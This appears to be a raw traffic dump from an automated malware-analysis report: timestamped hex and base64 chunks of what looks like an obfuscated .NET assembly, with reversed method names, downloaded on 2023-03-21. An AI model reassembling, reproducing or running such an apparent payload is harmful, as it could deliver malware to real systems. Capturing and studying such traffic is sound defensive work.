                                                                            Data Ascii: GVnbmFoQ2V0YXRTX2RkYQB0ZXNzYXRpY2lscHhlAHJldHRlU251UgByZXR0ZVN0c29QAHJldHRlU3JldHNpZ2VSAHJldHRlU2V0YWRpbGFWAHJldHRlU2VkdWxjbkkAbGVkb010ZXNzQQBsZWRvTWVnYW5hTQByZXR0ZVN0Y2VsZmVSAHJldHRlU3RudW9DAHJldHRlU3R1b2dvTAByZXR0ZVN0aW5JAHJldHRlU3BvUAByZXR0ZVNlbGJhc2lE
                                                                            2023-03-21 08:10:10 UTC864INData Raw: 6d 56 77 62 33 4a 51 5a 58 52 68 62 48 56 6a 62 47 46 44 41 48 6c 30 63 6d 56 77 62 33 4a 51 5a 58 52 68 55 67 42 35 64 48 4a 6c 63 47 39 79 55 47 68 6a 64 47 46 51 41 48 6c 30 63 6d 56 77 62 33 4a 51 64 48 4a 68 64 46 4d 41 65 58 52 79 5a 58 42 76 63 6c 42 73 62 47 46 44 41 48 6c 30 63 6d 56 77 62 33 4a 51 5a 58 52 68 5a 47 6c 73 59 56 59 41 65 58 52 79 5a 58 42 76 63 6c 42 6c 63 6d 46 77 62 57 39 44 41 48 6c 30 63 6d 56 77 62 33 4a 51 64 47 4e 6c 62 47 56 54 41 48 6c 30 63 6d 56 77 62 33 4a 51 64 47 4e 6c 62 47 78 76 51 77 42 35 64 48 4a 6c 63 47 39 79 55 48 52 75 64 57 39 44 41 48 6c 30 63 6d 56 77 62 33 4a 51 5a 58 52 6c 62 47 56 45 41 48 6c 30 63 6d 56 77 62 33 4a 51 64 47 35 70 63 6c 41 41 65 58 52 79 5a 58 42 76 63 6c 42 30 64 57 39 6e 62 30 77 41
                                                                            Data Ascii: mVwb3JQZXRhbHVjbGFDAHl0cmVwb3JQZXRhUgB5dHJlcG9yUGhjdGFQAHl0cmVwb3JQdHJhdFMAeXRyZXBvclBsbGFDAHl0cmVwb3JQZXRhZGlsYVYAeXRyZXBvclBlcmFwbW9DAHl0cmVwb3JQdGNlbGVTAHl0cmVwb3JQdGNlbGxvQwB5dHJlcG9yUHRudW9DAHl0cmVwb3JQZXRlbGVEAHl0cmVwb3JQdG5pclAAeXRyZXBvclB0dW9nb0wA
                                                                            2023-03-21 08:10:10 UTC880INData Raw: 56 52 30 62 32 64 79 62 30 59 41 61 33 4e 68 56 47 68 6a 63 6d 46 6c 55 77 42 72 63 32 46 55 63 47 46 4e 41 47 74 7a 59 56 52 30 59 32 56 73 5a 56 4d 41 61 33 4e 68 56 48 52 6a 5a 57 78 73 62 30 4d 41 61 33 4e 68 56 47 56 73 59 6d 46 7a 61 55 51 41 61 33 4e 68 56 47 56 30 59 57 78 31 59 32 78 68 51 77 42 72 63 32 46 55 5a 58 52 68 55 67 42 72 63 32 46 55 61 47 4e 30 59 56 41 41 63 32 56 31 62 47 46 57 5a 47 46 76 62 48 42 56 41 47 74 7a 59 56 52 30 63 6d 46 30 55 77 42 72 63 32 46 55 62 47 78 68 51 77 42 72 63 32 46 55 5a 58 52 68 5a 47 6c 73 59 56 59 41 61 33 4e 68 56 47 56 79 59 58 42 74 62 30 4d 41 5a 57 31 70 56 47 78 68 63 33 4a 6c 64 6d 6c 75 56 57 39 55 41 48 64 76 54 6c 39 30 5a 57 63 41 5a 47 52 42 41 47 56 74 61 56 52 6c 64 47 46 45 41 47 52 6c
                                                                            Data Ascii: VR0b2dyb0YAa3NhVGhjcmFlUwBrc2FUcGFNAGtzYVR0Y2VsZVMAa3NhVHRjZWxsb0MAa3NhVGVsYmFzaUQAa3NhVGV0YWx1Y2xhQwBrc2FUZXRhUgBrc2FUaGN0YVAAc2V1bGFWZGFvbHBVAGtzYVR0cmF0UwBrc2FUbGxhQwBrc2FUZXRhZGlsYVYAa3NhVGVyYXBtb0MAZW1pVGxhc3JldmluVW9UAHdvTl90ZWcAZGRBAGVtaVRldGFEAGRl
                                                                            2023-03-21 08:10:10 UTC896INData Raw: 46 46 54 41 47 35 76 61 58 52 77 5a 57 4e 34 52 57 4a 45 41 47 35 76 61 58 52 77 5a 57 4e 34 52 57 56 30 61 55 78 52 55 77 42 7a 64 47 35 68 64 48 4e 75 62 30 4e 6c 62 6d 6c 6d 5a 55 52 6c 64 47 6c 4d 55 56 4d 41 63 6d 56 30 64 47 56 54 5a 58 52 68 5a 47 6c 6b 62 6d 46 44 41 48 4a 6c 5a 47 46 6c 55 6d 46 30 59 55 52 69 52 41 42 79 5a 57 52 68 5a 56 4a 68 64 47 46 45 5a 58 52 70 54 46 46 54 41 48 4a 6c 64 48 42 68 5a 45 46 68 64 47 46 45 59 6b 51 41 63 6d 56 30 63 47 46 6b 51 57 46 30 59 55 52 6c 64 47 6c 4d 55 56 4d 41 63 6d 56 79 59 58 42 74 62 30 4e 6e 62 6d 6c 79 64 46 4e 6c 62 57 46 4f 5a 58 42 35 56 41 42 6e 62 6d 6c 77 63 47 46 4e 5a 58 42 35 56 47 4a 45 5a 58 52 70 54 46 46 54 41 48 42 68 54 57 56 77 65 56 52 69 52 47 56 30 61 55 78 52 55 77 42 6c
                                                                            Data Ascii: FFTAG5vaXRwZWN4RWJEAG5vaXRwZWN4RWV0aUxRUwBzdG5hdHNub0NlbmlmZURldGlMUVMAcmV0dGVTZXRhZGlkbmFDAHJlZGFlUmF0YURiRAByZWRhZVJhdGFEZXRpTFFTAHJldHBhZEFhdGFEYkQAcmV0cGFkQWF0YURldGlMUVMAcmVyYXBtb0NnbmlydFNlbWFOZXB5VABnbmlwcGFNZXB5VGJEZXRpTFFTAHBhTWVweVRiRGV0aUxRUwBl
                                                                            2023-03-21 08:10:10 UTC912INData Raw: 52 51 42 44 51 45 4f 41 51 77 42 44 51 45 4c 41 51 77 42 42 67 45 48 41 51 55 42 42 67 45 45 41 51 55 42 41 77 45 45 41 51 45 42 41 77 44 2b 41 4e 4d 41 2f 51 44 53 41 50 59 41 30 51 44 72 41 4e 41 41 36 51 44 4f 41 4f 67 41 79 41 44 69 41 4d 63 41 34 41 43 2b 41 4e 38 41 75 41 44 64 41 4c 55 41 31 41 43 79 41 4e 41 41 73 51 43 6f 41 4b 49 41 67 41 43 43 41 48 73 41 66 67 42 34 41 48 73 41 63 77 42 36 41 48 49 41 65 51 42 73 41 48 59 41 59 51 42 31 41 45 30 41 61 51 41 2f 41 47 67 41 50 67 42 6c 41 44 30 41 5a 41 41 37 41 46 73 41 4e 77 42 57 41 44 59 41 50 77 41 31 41 44 6f 41 4d 77 41 35 41 43 38 41 4b 51 41 72 41 43 67 41 4a 67 41 6e 41 41 51 41 49 77 41 42 41 43 49 44 4e 41 41 41 32 35 34 41 41 41 4d 30 41 41 44 62 6e 67 41 41 41 4e 59 41 41 4d 6c 67
                                                                            Data Ascii: RQBDQEOAQwBDQELAQwBBgEHAQUBBgEEAQUBAwEEAQEBAwD+ANMA/QDSAPYA0QDrANAA6QDOAOgAyADiAMcA4AC+AN8AuADdALUA1ACyANAAsQCoAKIAgACCAHsAfgB4AHsAcwB6AHIAeQBsAHYAYQB1AE0AaQA/AGgAPgBlAD0AZAA7AFsANwBWADYAPwA1ADoAMwA5AC8AKQArACgAJgAnAAQAIwABACIDNAAA254AAAM0AADbngAAANYAAMlg
                                                                            2023-03-21 08:10:10 UTC928INData Raw: 6c 59 48 55 54 33 36 41 41 43 78 79 41 61 5a 50 65 4d 41 41 43 72 51 41 61 6b 39 79 67 41 41 56 7a 77 45 61 54 67 57 41 41 43 68 6d 41 45 78 50 63 51 41 41 44 67 67 42 78 6b 39 70 67 41 41 6e 34 59 42 2b 54 68 71 41 41 42 55 66 41 44 70 4f 44 51 41 41 43 5a 54 42 78 6b 41 4e 77 41 41 4e 6c 59 44 38 54 31 38 41 41 41 6c 6c 51 4a 5a 41 44 63 41 41 44 5a 57 41 54 45 41 4e 77 41 41 4a 75 49 47 4b 54 31 32 41 41 42 56 43 51 42 42 41 44 63 41 41 47 70 56 41 4e 51 48 74 41 41 41 55 47 6f 41 31 41 65 30 41 41 42 51 61 67 44 63 44 78 67 41 41 49 68 44 41 69 6b 48 76 41 41 41 72 42 4d 47 4b 51 65 34 41 41 43 67 56 51 45 78 50 53 30 41 41 42 77 77 42 76 45 39 4b 41 41 41 4b 48 63 42 49 51 52 66 41 41 43 6f 36 41 5a 35 50 47 51 41 41 44 71 57 42 73 45 45 58 77 41 41
                                                                            Data Ascii: lYHUT36AACxyAaZPeMAACrQAak9ygAAVzwEaTgWAAChmAExPcQAADggBxk9pgAAn4YB+ThqAABUfADpODQAACZTBxkANwAANlYD8T18AAAllQJZADcAADZWATEANwAAJuIGKT12AABVCQBBADcAAGpVANQHtAAAUGoA1Ae0AABQagDcDxgAAIhDAikHvAAArBMGKQe4AACgVQExPS0AABwwBvE9KAAAKHcBIQRfAACo6AZ5PGQAADqWBsEEXwAA
                                                                            2023-03-21 08:10:10 UTC944INData Raw: 41 44 69 4f 51 41 46 41 41 41 41 41 4f 49 30 41 41 51 41 41 41 41 42 4a 4f 51 41 41 77 41 41 41 41 45 6b 33 51 41 43 41 41 41 41 41 53 54 56 41 41 45 41 41 41 41 42 4a 4e 55 41 41 51 41 41 41 41 45 6b 31 51 41 43 41 41 41 41 41 53 54 49 41 41 45 41 41 41 41 42 4a 4d 67 41 41 51 41 41 41 41 45 6b 79 41 41 42 41 41 41 41 41 53 54 4f 41 41 49 41 41 41 41 42 4a 4d 67 41 41 51 41 41 41 41 45 49 4f 77 41 47 41 41 41 41 41 53 54 49 41 41 55 41 41 41 41 41 34 6a 6b 41 42 41 41 41 41 41 44 69 4e 41 41 44 41 41 41 41 41 53 54 44 41 41 49 41 41 41 41 41 62 37 51 41 41 51 41 41 41 41 45 49 4f 77 41 47 41 41 41 41 41 53 54 49 41 41 55 41 41 41 41 41 34 6a 6b 41 42 41 41 41 41 41 44 69 4e 41 41 44 41 41 41 41 41 53 54 44 41 41 49 41 41 41 41 41 62 37 51 41 41 51 41 41
                                                                            Data Ascii: ADiOQAFAAAAAOI0AAQAAAABJOQAAwAAAAEk3QACAAAAASTVAAEAAAABJNUAAQAAAAEk1QACAAAAASTIAAEAAAABJMgAAQAAAAEkyAABAAAAASTOAAIAAAABJMgAAQAAAAEIOwAGAAAAASTIAAUAAAAA4jkABAAAAADiNAADAAAAASTDAAIAAAAAb7QAAQAAAAEIOwAGAAAAASTIAAUAAAAA4jkABAAAAADiNAADAAAAASTDAAIAAAAAb7QAAQAA
                                                                            2023-03-21 08:10:10 UTC960INData Raw: 41 41 65 43 41 41 42 41 41 41 41 41 42 34 49 41 41 45 41 41 41 41 41 48 67 67 41 41 51 41 41 41 41 41 65 43 41 41 42 41 41 41 41 41 42 34 49 41 41 45 41 41 41 41 41 48 67 67 41 41 51 41 41 41 41 41 65 43 41 41 42 41 41 41 41 41 42 34 49 41 41 45 41 41 41 41 41 48 67 67 41 41 51 41 41 41 41 41 65 43 41 41 42 41 41 41 41 41 42 34 49 41 41 45 41 41 41 41 41 48 67 67 41 41 51 41 41 41 41 41 65 43 41 41 42 41 41 41 41 41 42 34 49 41 41 45 41 41 41 41 41 48 67 67 41 41 51 41 41 41 41 41 65 43 41 41 42 41 41 41 41 41 42 34 49 41 41 45 41 41 41 41 41 48 67 67 41 41 51 41 41 41 41 41 65 43 41 41 42 41 41 41 41 41 42 34 49 41 41 45 41 41 41 41 41 48 67 67 41 41 51 41 41 41 41 41 65 43 41 41 42 41 41 41 41 41 42 34 49 41 41 45 41 41 41 41 41 48 67 67 41 41 51 41 41
                                                                            Data Ascii: AAeCAABAAAAAB4IAAEAAAAAHggAAQAAAAAeCAABAAAAAB4IAAEAAAAAHggAAQAAAAAeCAABAAAAAB4IAAEAAAAAHggAAQAAAAAeCAABAAAAAB4IAAEAAAAAHggAAQAAAAAeCAABAAAAAB4IAAEAAAAAHggAAQAAAAAeCAABAAAAAB4IAAEAAAAAHggAAQAAAAAeCAABAAAAAB4IAAEAAAAAHggAAQAAAAAeCAABAAAAAB4IAAEAAAAAHggAAQAA
                                                                            2023-03-21 08:10:10 UTC976INData Raw: 41 42 53 42 67 41 43 41 41 41 41 41 45 6a 53 41 41 45 41 41 41 41 41 55 64 41 41 41 77 41 41 41 41 42 52 79 41 41 43 41 41 41 41 41 43 39 4e 41 41 45 41 41 41 41 41 4e 49 49 41 41 77 41 41 41 41 42 52 73 77 41 43 41 41 41 41 41 44 2f 7a 41 41 45 41 41 41 41 41 52 75 41 41 41 51 41 41 41 41 42 52 55 51 41 42 41 41 41 41 41 46 46 52 41 41 45 41 41 41 41 41 55 56 45 41 41 51 41 41 41 41 42 52 55 51 41 42 41 41 41 41 41 46 46 43 41 41 45 41 41 41 41 41 55 45 38 41 41 51 41 41 41 41 41 65 43 41 41 42 41 41 41 41 41 46 42 50 41 41 45 41 41 41 41 41 55 4d 59 41 41 77 41 41 41 41 42 51 70 67 41 43 41 41 41 41 41 46 43 69 41 41 45 41 41 41 41 41 55 4b 59 41 41 67 41 41 41 41 42 51 6f 67 41 42 41 41 41 41 41 46 43 48 41 41 51 41 41 41 41 41 55 48 30 41 41 77 41 41
                                                                            Data Ascii: ABSBgACAAAAAEjSAAEAAAAAUdAAAwAAAABRyAACAAAAAC9NAAEAAAAANIIAAwAAAABRswACAAAAAD/zAAEAAAAARuAAAQAAAABRUQABAAAAAFFRAAEAAAAAUVEAAQAAAABRUQABAAAAAFFCAAEAAAAAUE8AAQAAAAAeCAABAAAAAFBPAAEAAAAAUMYAAwAAAABQpgACAAAAAFCiAAEAAAAAUKYAAgAAAABQogABAAAAAFCHAAQAAAAAUH0AAwAA
                                                                            2023-03-21 08:10:10 UTC992INData Raw: 4d 59 41 41 41 41 4a 57 61 41 51 6f 57 67 59 41 41 45 37 34 51 44 47 41 41 41 41 43 56 6d 41 45 4a 78 6f 47 41 41 41 4a 5a 55 41 78 67 41 41 41 41 6c 5a 61 42 43 61 62 4a 45 41 41 55 71 49 41 63 51 41 41 41 41 4a 57 4b 51 51 6d 57 79 4b 41 41 46 4b 64 41 48 45 41 41 41 41 43 56 65 51 45 4a 68 73 67 77 41 42 53 6c 55 42 78 41 41 41 41 41 6c 58 4c 42 43 58 62 49 4d 41 41 55 6f 30 41 63 51 41 41 41 41 4a 56 78 77 51 6c 78 75 72 41 41 46 4b 48 77 48 45 41 41 41 41 43 56 63 59 45 4a 59 41 71 51 41 41 41 46 6f 59 68 67 41 41 41 41 6c 57 76 42 43 57 43 55 41 41 41 55 6e 6a 41 4a 4d 41 41 41 41 4a 56 72 41 51 6c 67 61 31 41 41 46 4a 31 41 43 54 41 41 41 41 43 56 61 6b 45 4a 52 73 59 41 41 42 53 63 55 41 6b 77 41 41 41 41 6c 57 6b 42 43 53 62 46 63 41 41 55 6d 31
                                                                            Data Ascii: MYAAAAJWaAQoWgYAAE74QDGAAAACVmAEJxoGAAAJZUAxgAAAAlZaBCabJEAAUqIAcQAAAAJWKQQmWyKAAFKdAHEAAAACVeQEJhsgwABSlUBxAAAAAlXLBCXbIMAAUo0AcQAAAAJVxwQlxurAAFKHwHEAAAACVcYEJYAqQAAAFoYhgAAAAlWvBCWCUAAAUnjAJMAAAAJVrAQlga1AAFJ1ACTAAAACVakEJRsYAABScUAkwAAAAlWkBCSbFcAAUm1
                                                                            2023-03-21 08:10:10 UTC1008INData Raw: 4a 4d 41 41 41 41 49 63 4b 77 4e 47 51 4f 73 41 41 45 6a 64 51 43 54 41 41 41 41 43 48 43 6b 44 52 6b 44 72 41 41 42 49 32 49 41 6b 77 41 41 41 41 68 77 6e 41 30 5a 46 65 51 41 41 53 4e 4f 41 4a 4d 41 41 41 41 49 63 49 67 4e 47 52 74 30 41 41 45 6a 4f 77 43 54 41 41 41 41 43 48 42 34 44 52 6b 56 33 67 41 42 49 79 6b 41 6b 77 41 41 41 41 68 77 61 41 30 5a 41 31 59 41 41 53 4d 45 41 4a 4d 41 41 41 41 49 63 46 77 4e 47 54 33 51 41 41 45 69 38 51 43 54 41 41 41 41 43 48 42 49 44 52 6c 68 55 67 41 42 49 75 41 41 6b 77 41 41 41 41 68 77 4e 41 30 5a 41 31 59 41 41 53 4c 4c 41 4a 4d 41 41 41 41 49 63 43 67 4e 47 51 4e 57 41 41 45 69 6e 67 43 54 41 41 41 41 43 48 41 63 44 52 6b 44 6b 51 41 42 49 6f 73 41 6b 77 41 41 41 41 68 77 44 41 30 5a 43 4d 41 41 41 53 4a 33
                                                                            Data Ascii: JMAAAAIcKwNGQOsAAEjdQCTAAAACHCkDRkDrAABI2IAkwAAAAhwnA0ZFeQAASNOAJMAAAAIcIgNGRt0AAEjOwCTAAAACHB4DRkV3gABIykAkwAAAAhwaA0ZA1YAASMEAJMAAAAIcFwNGT3QAAEi8QCTAAAACHBIDRlhUgABIuAAkwAAAAhwNA0ZA1YAASLLAJMAAAAIcCgNGQNWAAEingCTAAAACHAcDRkDkQABIosAkwAAAAhwDA0ZCMAAASJ3
                                                                            2023-03-21 08:10:10 UTC1024INData Raw: 49 59 41 41 41 41 48 55 34 41 4a 63 56 47 71 41 41 44 67 48 77 43 54 41 41 41 41 42 31 4e 6b 43 57 35 52 6e 41 41 41 34 42 49 41 6b 77 41 41 41 41 64 54 4d 41 6c 75 55 5a 55 41 41 4f 41 48 41 4a 4d 41 41 41 41 48 55 79 51 4a 62 53 67 34 41 41 44 66 2b 41 43 54 41 41 41 41 42 31 4d 4d 43 57 30 5a 49 77 41 41 33 2b 77 41 6b 77 41 41 41 41 64 53 2f 41 6c 74 4b 53 4d 41 41 4e 2f 66 41 4a 4d 41 41 41 41 48 55 76 41 4a 62 51 4e 57 41 41 44 66 30 51 43 54 41 41 41 41 42 31 4c 6b 43 57 30 49 77 41 41 41 33 38 59 41 6b 77 41 41 41 41 64 53 31 41 6c 74 41 31 59 41 41 4e 2b 36 41 4a 4d 41 41 41 41 48 55 73 67 4a 62 51 4e 67 41 41 44 66 72 41 43 54 41 41 41 41 42 31 4b 38 43 57 30 44 56 67 41 41 33 35 38 41 6b 77 41 41 41 41 64 53 73 41 6c 74 43 55 55 41 41 4e 2b 54
                                                                            Data Ascii: IYAAAAHU4AJcVGqAADgHwCTAAAAB1NkCW5RnAAA4BIAkwAAAAdTMAluUZUAAOAHAJMAAAAHUyQJbSg4AADf+ACTAAAAB1MMCW0ZIwAA3+wAkwAAAAdS/AltKSMAAN/fAJMAAAAHUvAJbQNWAADf0QCTAAAAB1LkCW0IwAAA38YAkwAAAAdS1AltA1YAAN+6AJMAAAAHUsgJbQNgAADfrACTAAAAB1K8CW0DVgAA358AkwAAAAdSsAltCUUAAN+T
                                                                            2023-03-21 08:10:10 UTC1040INData Raw: 4a 4d 41 41 41 41 47 4a 75 77 48 48 51 61 31 41 41 43 73 69 67 43 54 41 41 41 41 42 69 62 67 42 78 30 4a 51 41 41 41 72 48 77 41 6b 77 41 41 41 41 59 6d 31 41 63 64 41 36 77 41 41 4b 78 71 41 4a 4d 41 41 41 41 47 4a 73 77 48 48 51 6c 41 41 41 43 73 57 51 43 54 41 41 41 41 42 69 62 41 42 78 30 4a 51 41 41 41 72 45 67 41 6b 77 41 41 41 41 59 6d 74 41 63 64 45 45 38 41 41 4b 77 33 41 4a 4d 41 41 41 41 47 4a 71 41 48 48 51 4e 57 41 41 43 73 4a 67 43 54 41 41 41 41 42 69 61 55 42 78 30 44 57 77 41 41 72 41 55 41 6b 77 41 41 41 41 59 6d 69 41 63 64 43 55 55 41 41 4b 76 7a 41 4a 4d 41 41 41 41 47 4a 6e 67 48 48 51 4e 57 41 41 43 72 33 77 43 54 41 41 41 41 42 69 5a 73 42 78 30 4d 6d 77 41 41 71 39 41 41 6b 77 41 41 41 41 59 6d 59 41 63 64 41 31 73 41 41 4b 76 41
                                                                            Data Ascii: JMAAAAGJuwHHQa1AACsigCTAAAABibgBx0JQAAArHwAkwAAAAYm1AcdA6wAAKxqAJMAAAAGJswHHQlAAACsWQCTAAAABibABx0JQAAArEgAkwAAAAYmtAcdEE8AAKw3AJMAAAAGJqAHHQNWAACsJgCTAAAABiaUBx0DWwAArAUAkwAAAAYmiAcdCUUAAKvzAJMAAAAGJngHHQNWAACr3wCTAAAABiZsBx0MmwAAq9AAkwAAAAYmYAcdA1sAAKvA
                                                                            2023-03-21 08:10:10 UTC1056INData Raw: 73 4d 41 41 41 41 45 4b 64 77 45 68 52 33 41 41 41 42 63 2f 41 4c 44 41 41 41 41 42 43 6d 77 42 49 51 64 75 77 41 41 58 4f 6b 43 77 77 41 41 41 41 51 70 71 41 53 44 42 68 45 41 41 46 7a 57 41 73 4d 41 41 41 41 45 4b 61 41 45 67 68 32 32 41 41 42 63 77 67 4c 44 41 41 41 41 42 43 6d 59 42 48 30 64 72 41 41 41 58 4b 4d 43 77 77 41 41 41 41 51 6e 35 41 52 37 48 59 77 41 41 46 78 49 41 73 4d 41 41 41 41 45 4a 71 67 45 64 78 32 67 41 41 42 63 58 51 4c 44 41 41 41 41 42 43 56 41 42 48 4d 64 6c 67 41 41 58 46 30 43 77 77 41 41 41 41 51 6a 78 41 52 76 48 57 73 41 41 46 76 5a 41 73 4d 41 41 41 41 45 49 73 41 45 61 42 31 35 41 41 42 63 43 41 4c 44 41 41 41 41 42 43 47 67 42 47 63 47 45 51 41 41 58 49 4d 43 77 77 41 41 41 41 51 68 6d 41 52 6c 48 50 63 41 41 46 76 53
                                                                            Data Ascii: sMAAAAEKdwEhR3AAABc/ALDAAAABCmwBIQduwAAXOkCwwAAAAQpqASDBhEAAFzWAsMAAAAEKaAEgh22AABcwgLDAAAABCmYBH0drAAAXKMCwwAAAAQn5AR7HYwAAFxIAsMAAAAEJqgEdx2gAABcXQLDAAAABCVABHMdlgAAXF0CwwAAAAQjxARvHWsAAFvZAsMAAAAEIsAEaB15AABcCALDAAAABCGgBGcGEQAAXIMCwwAAAAQhmARlHPcAAFvS
                                                                            2023-03-21 08:10:10 UTC1072INData Raw: 4a 4d 41 41 41 41 42 68 63 67 42 6b 41 4f 52 41 41 41 78 2f 77 43 54 41 41 41 41 41 59 57 34 41 5a 41 4a 76 51 41 41 4d 65 30 41 6b 77 41 41 41 41 47 46 70 41 47 50 41 34 73 41 41 44 48 63 41 4a 4d 41 41 41 41 42 68 5a 51 42 6a 77 4e 57 41 41 41 78 79 77 43 54 41 41 41 41 41 59 57 49 41 59 38 44 56 67 41 41 4d 62 6f 41 6b 77 41 41 41 41 47 46 66 41 47 50 43 55 41 41 41 44 47 69 41 4a 4d 41 41 41 41 42 68 58 41 42 6a 77 4e 57 41 41 41 78 6c 41 43 54 41 41 41 41 41 59 56 6b 41 59 38 44 56 67 41 41 4d 59 49 41 6b 77 41 41 41 41 47 46 57 41 47 50 41 35 45 41 41 44 46 6c 41 4a 4d 41 41 41 41 42 68 55 67 42 6a 77 30 6a 41 41 41 78 56 51 43 54 41 41 41 41 41 59 56 41 41 59 38 43 2f 67 41 41 4d 55 55 41 6b 77 41 41 41 41 47 46 4e 41 47 50 41 75 77 41 41 44 45 32
                                                                            Data Ascii: JMAAAABhcgBkAORAAAx/wCTAAAAAYW4AZAJvQAAMe0AkwAAAAGFpAGPA4sAADHcAJMAAAABhZQBjwNWAAAxywCTAAAAAYWIAY8DVgAAMboAkwAAAAGFfAGPCUAAADGiAJMAAAABhXABjwNWAAAxlACTAAAAAYVkAY8DVgAAMYIAkwAAAAGFWAGPA5EAADFlAJMAAAABhUgBjw0jAAAxVQCTAAAAAYVAAY8C/gAAMUUAkwAAAAGFNAGPAuwAADE2
                                                                            2023-03-21 08:10:10 UTC1088INData Raw: 61 55 41 41 4e 63 2f 67 46 59 70 70 51 41 41 31 79 32 41 56 69 6d 6c 41 41 44 58 47 34 42 57 4b 61 55 41 41 4e 63 4d 67 46 59 70 70 51 41 41 31 76 6d 41 56 69 6d 6c 41 41 44 57 37 49 42 57 4b 61 55 41 41 4e 62 65 67 46 59 70 70 51 41 41 31 74 43 41 56 69 6d 6c 41 41 44 57 78 49 42 57 4b 61 55 41 41 4e 61 78 67 46 59 70 70 51 41 41 31 71 47 41 56 69 6d 6c 41 41 44 57 6c 6f 42 57 4b 61 55 41 41 4e 61 41 67 46 59 70 70 51 41 41 31 6d 79 41 56 69 6d 6c 41 41 44 57 57 59 42 57 4b 61 55 41 41 4e 5a 4f 67 46 59 70 70 51 41 41 31 6b 4b 41 56 69 6d 6c 41 41 44 57 4d 34 42 57 4b 61 55 41 41 4e 59 68 67 46 59 70 70 51 41 41 31 68 61 41 56 69 6d 6c 41 41 44 57 41 34 42 57 4b 61 55 41 41 4e 58 34 67 46 59 70 70 51 41 41 31 65 75 41 56 69 6d 6c 41 41 44 56 33 59 42 57
                                                                            Data Ascii: aUAANc/gFYppQAA1y2AVimlAADXG4BWKaUAANcMgFYppQAA1vmAVimlAADW7IBWKaUAANbegFYppQAA1tCAVimlAADWxIBWKaUAANaxgFYppQAA1qGAVimlAADWloBWKaUAANaAgFYppQAA1myAVimlAADWWYBWKaUAANZOgFYppQAA1kKAVimlAADWM4BWKaUAANYhgFYppQAA1haAVimlAADWA4BWKaUAANX4gFYppQAA1euAVimlAADV3YBW
                                                                            2023-03-21 08:10:10 UTC1104INData Raw: 33 45 41 41 41 45 46 41 48 49 41 4c 67 42 35 41 41 41 41 41 41 41 41 41 32 67 41 41 41 45 46 41 47 34 41 49 77 42 78 41 41 41 41 41 41 41 41 41 36 30 41 45 41 47 41 41 47 6f 41 49 77 42 35 41 41 41 41 41 41 41 41 41 32 41 41 41 41 45 46 41 47 59 41 49 77 42 35 41 41 41 41 41 41 41 41 41 30 51 41 41 41 45 46 41 47 49 41 49 77 42 35 41 41 41 41 41 41 41 41 41 36 6b 41 41 41 45 46 41 46 34 41 49 77 42 35 41 41 41 41 41 41 41 41 41 36 55 41 41 41 45 46 41 46 6f 41 49 77 42 35 41 41 41 41 41 41 41 41 41 36 45 41 41 41 45 46 41 46 59 41 49 77 42 35 41 41 41 41 41 41 41 41 41 35 30 41 41 41 45 46 41 46 49 41 49 77 42 35 41 41 41 41 41 41 41 41 41 35 55 41 41 41 45 46 41 45 34 41 49 77 42 35 41 41 41 41 41 41 41 41 41 34 63 41 41 41 45 46 41 45 6f 41 49 77 42 35
                                                                            Data Ascii: 3EAAAEFAHIALgB5AAAAAAAAA2gAAAEFAG4AIwBxAAAAAAAAA60AEAGAAGoAIwB5AAAAAAAAA2AAAAEFAGYAIwB5AAAAAAAAA0QAAAEFAGIAIwB5AAAAAAAAA6kAAAEFAF4AIwB5AAAAAAAAA6UAAAEFAFoAIwB5AAAAAAAAA6EAAAEFAFYAIwB5AAAAAAAAA50AAAEFAFIAIwB5AAAAAAAAA5UAAAEFAE4AIwB5AAAAAAAAA4cAAAEFAEoAIwB5
                                                                            2023-03-21 08:10:10 UTC1120INData Raw: 48 4d 42 45 51 4c 2f 2f 2f 38 4c 4f 41 41 41 41 41 4d 67 4a 76 2f 2f 2f 78 59 36 42 41 41 46 78 6e 73 45 41 41 58 48 66 67 41 41 41 41 6f 67 41 41 41 41 4e 6a 6f 4b 41 41 51 37 4b 41 51 41 42 56 35 38 41 76 2f 2f 2f 7a 6f 34 41 41 41 41 42 69 41 6d 2f 2f 2f 2f 52 54 6f 45 41 41 57 49 65 77 51 41 42 63 64 2b 41 41 41 41 41 69 41 41 41 41 44 56 4f 51 6f 41 41 58 38 6f 42 41 41 46 58 58 77 43 41 41 41 42 4b 7a 67 45 41 41 56 66 66 51 6f 41 41 57 78 7a 41 66 34 57 41 66 34 57 41 68 45 43 2f 2f 2f 2f 67 54 67 41 41 41 41 42 49 43 62 2f 2f 2f 2b 4d 4f 67 51 41 42 59 39 37 42 41 41 46 78 33 34 41 41 41 41 42 49 41 51 41 42 56 78 39 42 67 41 53 65 79 67 46 45 51 4a 36 42 67 41 4b 52 6e 4e 77 41 4c 5a 79 63 67 51 52 41 41 41 41 78 6a 67 41 41 41 43 30 41 41 41 42
                                                                            Data Ascii: HMBEQL///8LOAAAAAMgJv///xY6BAAFxnsEAAXHfgAAAAogAAAANjoKAAQ7KAQABV58Av///zo4AAAABiAm////RToEAAWIewQABcd+AAAAAiAAAADVOQoAAX8oBAAFXXwCAAABKzgEAAVffQoAAWxzAf4WAf4WAhEC////gTgAAAABICb///+MOgQABY97BAAFx34AAAABIAQABVx9BgASeygFEQJ6BgAKRnNwALZycgQRAAAAxjgAAAC0AAAB
                                                                            2023-03-21 08:10:10 UTC1136INData Raw: 41 59 41 45 66 63 6f 41 77 51 41 42 54 64 37 41 76 2f 2f 2f 35 73 34 41 41 41 41 41 43 41 6d 2f 2f 2f 2f 70 6a 6b 45 41 41 57 62 65 77 51 41 42 63 64 2b 41 41 41 41 41 43 41 47 41 42 48 64 4b 41 4c 2f 2f 2f 2f 41 4f 41 41 41 41 41 45 67 4a 76 2f 2f 2f 38 73 35 42 41 41 46 76 6e 73 45 41 41 58 48 66 67 41 41 41 41 41 67 41 41 41 41 65 54 6b 42 45 51 41 41 41 45 73 34 41 41 41 41 61 41 41 41 41 43 73 41 41 41 42 34 41 41 41 41 55 41 41 41 41 41 52 46 41 41 41 4d 2f 67 41 41 41 41 41 34 41 41 41 4f 2f 67 41 41 41 41 4d 67 45 51 41 41 68 67 41 41 41 4b 30 41 41 7a 41 54 41 43 6f 47 41 41 32 42 4b 41 51 41 42 54 64 37 41 76 2f 2f 2f 38 49 34 41 41 41 41 41 43 41 6d 2f 2f 2f 2f 7a 54 6b 45 41 41 57 39 65 77 51 41 42 63 64 2b 41 41 41 41 41 43 41 47 41 42 48 64
